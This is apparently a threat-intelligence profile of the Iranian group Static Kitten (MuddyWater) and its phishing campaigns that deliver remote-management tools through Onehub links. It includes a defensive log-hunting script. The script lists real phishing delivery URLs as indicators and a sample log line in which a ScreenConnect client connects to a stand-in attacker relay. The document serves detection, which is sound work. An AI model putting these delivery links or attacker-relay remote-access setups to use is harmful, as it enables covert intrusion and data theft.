Static Kitten

Threat Actor Profile (updated 7 days ago)
Static Kitten, also known as MuddyWater, MERCURY, Mango Sandstorm and TA450, is an Iranian state-sponsored threat group assessed to be linked to the Iranian Ministry of Intelligence and Security (MOIS). Active since 2017, the group conducts cyber-espionage and relies on spear-phishing for initial access. A recurring feature of its tradecraft is the delivery of legitimate, commercially available remote monitoring and management (RMM) tools rather than custom malware, so that the intrusion blends in with ordinary administrative activity.

Recent activity covered by the sources listed below includes a spear-phishing campaign against Israeli entities that distributed N-able's Advanced Monitoring Agent, and a March 2024 campaign in which the group (tracked as TA450 in that reporting) again sent recipients to Onehub, a legitimate file-storage service it has abused repeatedly, this time via links embedded in PDF attachments; the downloads were ZIP files themed to be relevant to government-agency employees.

The Onehub technique itself is older. In a campaign against UAE and Kuwait government agencies documented by Anomali Threat Research, the phishing emails carried two Onehub links, "ws.onehub[.]com/files/7w1372el" and "ws.onehub[.]com/files/94otjyvd", leading to ZIP archives with names translating to "Analysis and study of the normalization of relations between the Arab countries and Israel", "Scholarships" and "Project". Each archive contained an executable that installs ScreenConnect, another legitimate remote-administration tool, which gives the operators hands-on access that is likely used to steal sensitive information or to download further malware for follow-on operations.

Because every component of this chain (Onehub, ScreenConnect, N-able's agent) is a legitimate product, hash- or signature-based detection adds little; defenders should instead look at context, such as RMM installers executed from user download directories, ScreenConnect clients connecting to relay hosts the organisation does not operate, and Onehub downloads that shortly precede such installs. Static Kitten's activities represent both a continuation and an evolution of tactics used by similar Iranian groups such as APT34, also known as Cobalt Gypsy, OilRig and Helix Kitten.
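The delivery chain above (a phishing link to a Onehub-hosted ZIP, followed by the install of a legitimate RMM client such as ScreenConnect) is easier to catch by correlating two log sources than by matching indicators alone. The following Python script is an added example written for this page, not code from Anomali, Cybergeist or any vendor. It refangs the two Onehub IOCs quoted above, scans constructed proxy and process-creation log lines (the key=value log format, hostnames, usernames and the ALLOWED_RELAYS allowlist are all assumptions), flags Onehub ZIP downloads and ScreenConnect installers that were launched from a user profile or pointed at a relay host outside the allowlist, and pairs each flagged download with an install by the same user within 30 minutes. The assumption that the relay host appears as an h= parameter in the client's launch arguments is also this example's, not the page's.

```python
"""Hunt for the Static Kitten delivery chain: Onehub-hosted ZIP download
followed by a ScreenConnect (RMM) install. Added example; every log line and
hostname below is constructed, not taken from the page or a real incident."""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Delivery URLs quoted on the page, kept defanged the way analysts share them.
DEFANGED_IOCS = [
    "ws.onehub[.]com/files/7w1372el",
    "ws.onehub[.]com/files/94otjyvd",
]
# Relay hosts the organisation legitimately uses for ScreenConnect (assumed).
ALLOWED_RELAYS = {"support.corp.example"}


def refang(ioc: str) -> str:
    """Reverse common defanging so an IOC can be matched against live logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


KNOWN_PATHS = {refang(i) for i in DEFANGED_IOCS}

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
_RELAY = re.compile(r'[?&]h=([^&\s"]+)')   # assumed: relay host passed as h=<host>


def parse_kv(line: str) -> dict:
    """Parse a constructed '<ISO ts> key=value ...' log line into a dict."""
    ts, _, rest = line.partition(" ")
    fields = {k: v.strip('"') for k, v in _KV.findall(rest)}
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return fields


def proxy_hits(lines):
    """Flag downloads that match a known Onehub IOC or the broader Onehub-ZIP TTP."""
    hits = []
    for line in lines:
        ev = parse_kv(line)
        u = urlparse(ev.get("url", ""))
        if f"{u.hostname}{u.path}" in KNOWN_PATHS:
            reason = "known Static Kitten Onehub URL"
        elif u.hostname == "ws.onehub.com" and ev.get("ctype") == "application/zip":
            reason = "ZIP fetched from Onehub (TTP match, not a listed IOC)"
        else:
            continue
        hits.append({"ts": ev["ts"], "user": ev["user"], "url": ev["url"], "reason": reason})
    return hits


def rmm_hits(lines, allowed_relays=ALLOWED_RELAYS):
    """Flag ScreenConnect clients run from a user profile or pointed at an unknown relay."""
    hits = []
    for line in lines:
        ev = parse_kv(line)
        image = ev.get("image", "")
        if "screenconnect" not in image.lower():
            continue
        reasons = []
        if "\\users\\" in image.lower():
            reasons.append("ScreenConnect installer launched from a user profile directory")
        m = _RELAY.search(ev.get("cmdline", ""))
        if m and m.group(1).lower() not in allowed_relays:
            reasons.append(f"relay host {m.group(1)} is not an approved ScreenConnect relay")
        if reasons:
            hits.append({"ts": ev["ts"], "user": ev["user"], "host": ev["host"], "reasons": reasons})
    return hits


def correlate(downloads, installs, window=timedelta(minutes=30)):
    """Pair each flagged download with an RMM install by the same user shortly after."""
    return [(d, i) for d in downloads for i in installs
            if d["user"] == i["user"] and timedelta(0) <= i["ts"] - d["ts"] <= window]


# Constructed sample logs: one user fetches a listed IOC and installs ScreenConnect
# two minutes later; another fetches an unlisted Onehub ZIP; IT runs a sanctioned client.
PROXY_LOG = [
    "2024-03-12T09:14:02Z user=amal src=10.1.4.22 method=GET url=https://ws.onehub.com/files/7w1372el status=200 ctype=application/zip",
    "2024-03-12T09:20:11Z user=dana src=10.1.4.31 method=GET url=https://ws.onehub.com/files/q9z8y7x6 status=200 ctype=application/zip",
    "2024-03-12T09:21:30Z user=dana src=10.1.4.31 method=GET url=https://www.example.com/index.html status=200 ctype=text/html",
]
PROCESS_LOG = [
    r'2024-03-12T09:16:40Z host=WS-0421 user=amal image="C:\Users\amal\Downloads\Project\ScreenConnect.ClientSetup.exe" parent=explorer.exe cmdline="ScreenConnect.ClientSetup.exe ?e=Access&y=Guest&h=relay.attacker-example.net&p=8041"',
    r'2024-03-12T11:02:05Z host=WS-0777 user=itops image="C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.WindowsClient.exe" parent=services.exe cmdline="ScreenConnect.WindowsClient.exe ?e=Access&h=support.corp.example&p=8041"',
]


def hunt(proxy_log=PROXY_LOG, process_log=PROCESS_LOG):
    """Run both detections and return (download, install) pairs worth an analyst's time."""
    return correlate(proxy_hits(proxy_log), rmm_hits(process_log))


if __name__ == "__main__":
    for download, install in hunt():
        print(f"{download['user']}: {download['reason']} at {download['ts']:%H:%M}, "
              f"then on {install['host']}: {'; '.join(install['reasons'])}")
```

The second proxy line shows why the TTP rule sits beside the IOC rule: the listed URLs will be dead long before the actor stops using Onehub, so the durable signal is "ZIP from a file-sharing host, then an RMM client from the user's profile, then a relay you do not own". The sanctioned IT install on WS-0777 is not flagged because it runs from Program Files and points at the allowlisted relay.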
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID | Votes | Profile Description
MuddyWater | 4 | MuddyWater is an advanced persistent threat (APT) group, also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros. This threat actor has been linked to the Iranian Ministry of Intelligence and Security (MOIS) according to a joint advisory from US and UK government agencies. The group empl
TA450 | 2 | TA450, an Advanced Persistent Threat (APT) group, is a threat actor linked to Iran that has been identified as being behind a series of cyber-attacks. APTs are typically associated with nation-states or state-sponsored groups and are known for their persistence and ability to remain undetected over
POWERSTATS | 1 | PowerStats is a malicious software (malware) created by the MuddyWater cyberespionage group, which is linked to Iran. This malware, written in PowerShell, was designed to exploit and damage computer systems, often infiltrating them without the user's knowledge through suspicious downloads, emails, o
TEMP.Zagros | 1 | TEMP.Zagros, also known as MuddyWater, Earth Vetala, MERCURY, Static Kitten, and Seedworm, is an Iran-nexus threat actor that has been active since at least May 2017. This group is associated with the Iranian Ministry of Intelligence and Security (MOIS) and has historically targeted regions and sect
APT34 | 1 | APT34, also known as OilRig, EUROPIUM, Hazel Sandstorm, and Crambus among other names, is a threat actor believed to be operating on behalf of the Iranian government. Operational since at least 2014, APT34 has been involved in long-term cyber espionage operations primarily focused on reconnaissance
Helix Kitten | 1 | Helix Kitten, also known as APT34, OilRig, Cobalt Gypsy, Hazel Sandstorm, and Crambus, is a threat actor believed to originate from Iran. The group has been tracked by various cybersecurity firms including FireEye, Symantec, and CrowdStrike, each using different names to identify the same entity. Th
Mango Sandstorm | 1 | Mango Sandstorm, also known as MuddyWater or Mercury, is a threat actor group linked to Iran's Ministry of Intelligence and Security (MOIS) by the Israeli government. The group has been identified as being involved in several cyber-attacks, utilizing various tactics to gain initial access to targete
MERCURY | 1 | Mercury, also known as MuddyWater and Static Kitten, is a threat actor group linked to global espionage activities, with suspected ties to the Iranian Ministry of Intelligence and Security. This group has been noted for its malicious activities, compromising multiple victims that another group, POLO
Seedworm | 1 | Seedworm, also known as MuddyWater, TEMP.Zagros, Static Kitten, and several other monikers, is a threat actor believed to be linked with Iran's Ministry of Intelligence and Security (MOIS). This cyberespionage group has been active since 2017, targeting various sectors globally, including government
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Phishing, APT, Malware, Microsoft, Government, Downloader, Iran, Iranian, Espionage, RMM, ScreenConnect
Associated Malware
ID | Type | Votes | Profile Description
Quicksand | Unspecified | 1 | Quicksand is a type of malware designed to exploit and damage computer systems. It infiltrates devices through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt operations, or even hold data hostage for ransom. This mali
Associated Threat Actors
ID | Type | Votes | Profile Description
Stardust Chollima | Unspecified | 1 | Stardust Chollima is a recognized threat actor in the cybersecurity industry, primarily known for its malicious activities aimed at acquiring funds. This group has been linked to various high-profile cyber-attacks and fraudulent activities since 2015. Stardust Chollima has been associated with the f
Crambus | Unspecified | 1 | The Iranian Crambus espionage group, also known as OilRig, APT34, and other aliases, is a threat actor with extensive expertise in long-term cyber-espionage campaigns. In the most recent attack between February and September 2023, this group infiltrated an unnamed Middle Eastern government's network
Associated Vulnerabilities
ID | Type | Votes | Profile Description
No associations to display
Source Document References
Information about the Static Kitten threat actor was drawn from the documents listed below (display limited to 20 results).
Source | Created | Title
BankInfoSecurity | 7 days ago | Iranian State Hackers Are Deploying a New Malware Backdoor
Securityaffairs | 4 months ago | Iran-Linked APT TA450 embeds malicious links in PDF attachments
BankInfoSecurity | 4 months ago | Iranian TA450 Group Tries Out New Tactics on Israelis
CERT-EU | 9 months ago | Cyberattack hits Ace Hardware
CERT-EU | 9 months ago | MuddyWater has been spotted targeting two Israeli entities
Securityaffairs | 9 months ago | MuddyWater has been spotted targeting two Israeli entities
CERT-EU | 9 months ago | Iran's MuddyWater Group Targets Israelis with Fake Memo Spear-Phishing
CERT-EU | 9 months ago | Iran's MuddyWater Targets Israel in New Spear-Phishing Cyber Campaign
CERT-EU | 9 months ago | Iranian Hackers Lurked for 8 Months in Government Network
CERT-EU | a year ago | Why is it so rare to hear about Western cyber-attacks?
MITRE | a year ago | Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies
CERT-EU | a year ago | Microsoft: Iranian APTs Exploiting Recent PaperCut Vulnerability